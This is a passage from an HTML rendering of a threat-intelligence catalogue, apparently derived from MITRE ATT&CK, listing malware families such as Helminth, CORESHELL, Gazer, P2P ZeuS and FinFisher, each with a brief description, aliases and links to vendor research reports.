<p>Helminth is a backdoor that has at least two variants - one written in VBScript and PowerShell that is delivered via a macros in Excel spreadsheets, and one that is a standalone Windows executable. (Citation: Palo Alto OilRig May 2016)</p>
</div>
<div class="paragraph">
<p>Aliases: Helminth</p>
</div>
<div class="paragraph">
<p>Contributors: Robert Falcone</p>
</div>
<div class="paragraph">
<p>Helminth - S0170 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Helminth</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1071. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0170">https://attack.mitre.org/wiki/Software/S0170</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/">http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_coreshell_s0137"><a class="anchor" href="#_coreshell_s0137"></a><a class="link" href="#_coreshell_s0137">CORESHELL - S0137</a></h3>
<div class="paragraph">
<p>CORESHELL is a downloader used by APT28. The older versions of this malware are known as SOURFACE and newer versions as CORESHELL. It has also been referred to as Sofacy, though that term has been used widely to refer to both the group APT28 and malware families associated with the group. (Citation: FireEye APT28) (Citation: FireEye APT28) January 2017</p>
</div>
<div class="paragraph">
<p>Aliases: CORESHELL, SOURFACE</p>
</div>
<div class="paragraph">
<p>CORESHELL - S0137 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>CORESHELL</p>
</li>
<li>
<p>SOURFACE</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1072. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0137">https://attack.mitre.org/wiki/Software/S0137</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf">https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_soundbite_s0157"><a class="anchor" href="#_soundbite_s0157"></a><a class="link" href="#_soundbite_s0157">SOUNDBITE - S0157</a></h3>
<div class="paragraph">
<p>SOUNDBITE is a signature backdoor used by APT32. (Citation: FireEye APT32 May 2017)</p>
</div>
<div class="paragraph">
<p>Aliases: SOUNDBITE</p>
</div>
<div class="paragraph">
<p>SOUNDBITE - S0157 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>SOUNDBITE</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1073. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0157">https://attack.mitre.org/wiki/Software/S0157</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html">https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_remsec_s0125"><a class="anchor" href="#_remsec_s0125"></a><a class="link" href="#_remsec_s0125">Remsec - S0125</a></h3>
<div class="paragraph">
<p>Remsec is a modular backdoor that has been used by Strider and appears to have been designed primarily for espionage purposes. Many of its modules are written in Lua. (Citation: Symantec Strider Blog)</p>
</div>
<div class="paragraph">
<p>Aliases: Remsec, Backdoor.Remsec, ProjectSauron</p>
</div>
<div class="paragraph">
<p>Remsec - S0125 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Remsec</p>
</li>
<li>
<p>Backdoor.Remsec</p>
</li>
<li>
<p>ProjectSauron</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1074. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0125">https://attack.mitre.org/wiki/Software/S0125</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets">http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_flashflood_s0036"><a class="anchor" href="#_flashflood_s0036"></a><a class="link" href="#_flashflood_s0036">FLASHFLOOD - S0036</a></h3>
<div class="paragraph">
<p>FLASHFLOOD is malware developed by APT30 that allows propagation and exfiltration of data over removable devices. APT30 may use this capability to exfiltrate data across air-gaps. (Citation: FireEye APT30)</p>
</div>
<div class="paragraph">
<p>Aliases: FLASHFLOOD</p>
</div>
<div class="paragraph">
<p>FLASHFLOOD - S0036 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>FLASHFLOOD</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1075. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0036">https://attack.mitre.org/wiki/Software/S0036</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf">https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_tinytyphon_s0131"><a class="anchor" href="#_tinytyphon_s0131"></a><a class="link" href="#_tinytyphon_s0131">TINYTYPHON - S0131</a></h3>
<div class="paragraph">
<p>TINYTYPHON is a backdoor that has been used by the actors responsible for the MONSOON campaign. The majority of its code was reportedly taken from the MyDoom worm. (Citation: Forcepoint Monsoon)</p>
</div>
<div class="paragraph">
<p>Aliases: TINYTYPHON</p>
</div>
<div class="paragraph">
<p>TINYTYPHON - S0131 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>TINYTYPHON</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1076. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0131">https://attack.mitre.org/wiki/Software/S0131</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf">https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gazer_s0168"><a class="anchor" href="#_gazer_s0168"></a><a class="link" href="#_gazer_s0168">Gazer - S0168</a></h3>
<div class="paragraph">
<p>Gazer is a backdoor used by Turla since at least 2016. (Citation: ESET Gazer Aug 2017)</p>
</div>
<div class="paragraph">
<p>Aliases: Gazer, WhiteBear</p>
</div>
<div class="paragraph">
<p>Contributors: Bartosz Jerzman</p>
</div>
<div class="paragraph">
<p>Gazer - S0168 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Gazer</p>
</li>
<li>
<p>WhiteBear</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1077. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0168">https://attack.mitre.org/wiki/Software/S0168</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf">https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_seaduke_s0053"><a class="anchor" href="#_seaduke_s0053"></a><a class="link" href="#_seaduke_s0053">SeaDuke - S0053</a></h3>
<div class="paragraph">
<p>SeaDuke is malware that was used by APT29 from 2014 to 2015. It was used primarily as a secondary backdoor for victims that were already compromised with CozyCar. (Citation: F-Secure The Dukes)</p>
</div>
<div class="paragraph">
<p>Aliases: SeaDuke, SeaDaddy, SeaDesk</p>
</div>
<div class="paragraph">
<p>SeaDuke - S0053 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>SeaDuke</p>
</li>
<li>
<p>SeaDaddy</p>
</li>
<li>
<p>SeaDesk</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1078. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0053">https://attack.mitre.org/wiki/Software/S0053</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.f-secure.com/documents/996508/1030745/dukes%20whitepaper.pdf">https://www.f-secure.com/documents/996508/1030745/dukes%20whitepaper.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_halfbaked_s0151"><a class="anchor" href="#_halfbaked_s0151"></a><a class="link" href="#_halfbaked_s0151">HALFBAKED - S0151</a></h3>
<div class="paragraph">
<p>HALFBAKED is a malware family consisting of multiple components intended to establish persistence in victim networks. (Citation: FireEye FIN7 April 2017)</p>
</div>
<div class="paragraph">
<p>Aliases: HALFBAKED</p>
</div>
<div class="paragraph">
<p>HALFBAKED - S0151 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>HALFBAKED</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1079. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0151">https://attack.mitre.org/wiki/Software/S0151</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html">https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_advstoreshell_s0045"><a class="anchor" href="#_advstoreshell_s0045"></a><a class="link" href="#_advstoreshell_s0045">ADVSTORESHELL - S0045</a></h3>
<div class="paragraph">
<p>ADVSTORESHELL is a spying backdoor that has been used by APT28 from at least 2012 to 2016. It is generally used for long-term espionage and is deployed on targets deemed interesting after a reconnaissance phase. (Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 2)</p>
</div>
<div class="paragraph">
<p>Aliases: ADVSTORESHELL, NETUI, EVILTOSS, AZZY, Sedreco</p>
</div>
<div class="paragraph">
<p>ADVSTORESHELL - S0045 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>ADVSTORESHELL</p>
</li>
<li>
<p>NETUI</p>
</li>
<li>
<p>EVILTOSS</p>
</li>
<li>
<p>AZZY</p>
</li>
<li>
<p>Sedreco</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1080. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0045">https://attack.mitre.org/wiki/Software/S0045</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/">https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf">http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_snugride_s0159"><a class="anchor" href="#_snugride_s0159"></a><a class="link" href="#_snugride_s0159">SNUGRIDE - S0159</a></h3>
<div class="paragraph">
<p>SNUGRIDE is a backdoor that has been used by menuPass as first stage malware. (Citation: FireEye APT10 April 2017)</p>
</div>
<div class="paragraph">
<p>Aliases: SNUGRIDE</p>
</div>
<div class="paragraph">
<p>SNUGRIDE - S0159 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>SNUGRIDE</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1081. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0159">https://attack.mitre.org/wiki/Software/S0159</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/04/apt10%20menupass%20grou.html">https://www.fireeye.com/blog/threat-research/2017/04/apt10%20menupass%20grou.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_s_type_s0085"><a class="anchor" href="#_s_type_s0085"></a><a class="link" href="#_s_type_s0085">S-Type - S0085</a></h3>
<div class="paragraph">
<p>S-Type is a backdoor that was used by Dust Storm from 2013 to 2014. (Citation: Cylance Dust Storm)</p>
</div>
<div class="paragraph">
<p>Aliases: S-Type</p>
</div>
<div class="paragraph">
<p>S-Type - S0085 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>S-Type</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1082. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0085">https://attack.mitre.org/wiki/Software/S0085</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.cylance.com/content/dam/cylance/pdfs/reports/Op%20Dust%20Storm%20Report.pdf">https://www.cylance.com/content/dam/cylance/pdfs/reports/Op%20Dust%20Storm%20Report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_nettraveler_s0033"><a class="anchor" href="#_nettraveler_s0033"></a><a class="link" href="#_nettraveler_s0033">NetTraveler - S0033</a></h3>
<div class="paragraph">
<p>NetTraveler is malware that has been used in multiple cyber espionage campaigns for basic surveillance of victims. The earliest known samples have timestamps back to 2005, and the largest number of observed samples were created between 2010 and 2013. (Citation: Kaspersky NetTraveler)</p>
</div>
<div class="paragraph">
<p>Aliases: NetTraveler</p>
</div>
<div class="paragraph">
<p>NetTraveler - S0033 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>NetTraveler</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1083. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0033">https://attack.mitre.org/wiki/Software/S0033</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.securelist.com/en/downloads/vlpdfs/kaspersky-the-net-traveler-part1-final.pdf">http://www.securelist.com/en/downloads/vlpdfs/kaspersky-the-net-traveler-part1-final.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_remotecmd_s0166"><a class="anchor" href="#_remotecmd_s0166"></a><a class="link" href="#_remotecmd_s0166">RemoteCMD - S0166</a></h3>
<div class="paragraph">
<p>is a custom tool used by APT3 to execute commands on a remote system similar to SysInternal&#8217;s PSEXEC functionality. (Citation: Symantec Buckeye)</p>
</div>
<div class="paragraph">
<p>Aliases: RemoteCMD</p>
</div>
<div class="paragraph">
<p>RemoteCMD - S0166 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>RemoteCMD</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1084. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0166">https://attack.mitre.org/wiki/Software/S0166</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong">http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dyre_s0024"><a class="anchor" href="#_dyre_s0024"></a><a class="link" href="#_dyre_s0024">Dyre - S0024</a></h3>
<div class="paragraph">
<p>Dyre is a Trojan that usually targets banking information. (Citation: Raff 2015)</p>
</div>
<div class="paragraph">
<p>Aliases: Dyre</p>
</div>
<div class="paragraph">
<p>Dyre - S0024 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Dyre</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1085. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0024">https://attack.mitre.org/wiki/Software/S0024</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.seculert.com/blogs/new-dyre-version-yet-another-malware-evading-sandboxes">http://www.seculert.com/blogs/new-dyre-version-yet-another-malware-evading-sandboxes</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_p2p_zeus_s0016"><a class="anchor" href="#_p2p_zeus_s0016"></a><a class="link" href="#_p2p_zeus_s0016">P2P ZeuS - S0016</a></h3>
<div class="paragraph">
<p>P2P ZeuS is a closed-source fork of the leaked version of the ZeuS botnet. It presents improvements over the leaked version, including a peer-to-peer architecture. (Citation: Dell P2P ZeuS)</p>
</div>
<div class="paragraph">
<p>Aliases: P2P ZeuS, Peer-to-Peer ZeuS, Gameover ZeuS</p>
</div>
<div class="paragraph">
<p>P2P ZeuS - S0016 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>P2P ZeuS</p>
</li>
<li>
<p>Peer-to-Peer ZeuS</p>
</li>
<li>
<p>Gameover ZeuS</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1086. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0016">https://attack.mitre.org/wiki/Software/S0016</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.secureworks.com/cyber-threat-intelligence/threats/The%20Lifecycle%20of%20Peer%20to%20Peer%20Gameover%20ZeuS/">http://www.secureworks.com/cyber-threat-intelligence/threats/The%20Lifecycle%20of%20Peer%20to%20Peer%20Gameover%20ZeuS/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_finfisher_s0182"><a class="anchor" href="#_finfisher_s0182"></a><a class="link" href="#_finfisher_s0182">FinFisher - S0182</a></h3>
<div class="paragraph">
<p>is a government-grade commercial surveillance reportedly sold exclusively to government agencies for use in targeted and lawful criminal investigations. (Citation: FinFisher) (Citation: Microsoft SIR Vol 21)</p>
</div>
<div class="paragraph">
<p>Aliases: (Citation: FinFisher)</p>
</div>
<div class="paragraph">
<p>FinFisher - S0182 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>FinFisher</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1087. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0182">https://attack.mitre.org/wiki/Software/S0182</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.finfisher.com/FinFisher/index.html">http://www.finfisher.com/FinFisher/index.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft%20Security%20Intelligence%20Report%20Volume%2021%20English.pdf">http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft%20Security%20Intelligence%20Report%20Volume%2021%20English.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_comrat_s0126"><a class="anchor" href="#_comrat_s0126"></a><a class="link" href="#_comrat_s0126">ComRAT - S0126</a></h3>
<div class="paragraph">
<p>ComRAT is a remote access tool suspected of being a decedent of Agent.btz and used by Turla. (Citation: Symantec Waterbug) (Citation: NorthSec 2015 GData Uroburos Tools)</p>
</div>
<div class="paragraph">
<p>Aliases: ComRAT</p>
</div>
<div class="paragraph">
<p>ComRAT - S0126 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>ComRAT</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1088. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0126">https://attack.mitre.org/wiki/Software/S0126</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/content/en/us/enterprise/media/security%20response/whitepapers/waterbug-attack-group.pdf">http://www.symantec.com/content/en/us/enterprise/media/security%20response/whitepapers/waterbug-attack-group.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.nsec.io/wp-content/uploads/2015/05/uroburos-actors-tools-1.1.pdf">https://www.nsec.io/wp-content/uploads/2015/05/uroburos-actors-tools-1.1.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_poshspy_s0150"><a class="anchor" href="#_poshspy_s0150"></a><a class="link" href="#_poshspy_s0150">POSHSPY - S0150</a></h3>
<div class="paragraph">
<p>POSHSPY is a backdoor that has been used by APT29 since at least 2015. It appears to be used as a secondary backdoor used if the actors lost access to their primary backdoors. (Citation: FireEye POSHSPY April 2017)</p>
</div>
<div class="paragraph">
<p>Aliases: POSHSPY</p>
</div>
<div class="paragraph">
<p>POSHSPY - S0150 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>POSHSPY</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1089. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0150">https://attack.mitre.org/wiki/Software/S0150</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/03/dissecting%20one%20ofap.html">https://www.fireeye.com/blog/threat-research/2017/03/dissecting%20one%20ofap.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_felismus_s0171"><a class="anchor" href="#_felismus_s0171"></a><a class="link" href="#_felismus_s0171">Felismus - S0171</a></h3>
<div class="paragraph">
<p>is a modular backdoor that has been used by Sowbug. (Citation: Symantec Sowbug Nov 2017) (Citation: Forcepoint Felismus Mar 2017)</p>
</div>
<div class="paragraph">
<p>Aliases: Felismus</p>
</div>
<div class="paragraph">
<p>Felismus - S0171 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Felismus</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1090. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0171">https://attack.mitre.org/wiki/Software/S0171</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments">https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blogs.forcepoint.com/security-labs/playing-cat-mouse-introducing-felismus-malware">https://blogs.forcepoint.com/security-labs/playing-cat-mouse-introducing-felismus-malware</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_truvasys_s0178"><a class="anchor" href="#_truvasys_s0178"></a><a class="link" href="#_truvasys_s0178">Truvasys - S0178</a></h3>
<div class="paragraph">
<p>is first-stage malware that has been used by PROMETHIUM. It is a collection of modules written in the Delphi programming language. (Citation: Microsoft Win Defender Truvasys Sep 2017) (Citation: Microsoft NEODYMIUM Dec 2016) (Citation: Microsoft SIR Vol 21)</p>
</div>
<div class="paragraph">
<p>Aliases: Truvasys</p>
</div>
<div class="paragraph">
<p>Truvasys - S0178 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Truvasys</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1091. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0178">https://attack.mitre.org/wiki/Software/S0178</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Win32/Truvasys.A!dha">https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Win32/Truvasys.A!dha</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/">https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft%20Security%20Intelligence%20Report%20Volume%2021%20English.pdf">http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft%20Security%20Intelligence%20Report%20Volume%2021%20English.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
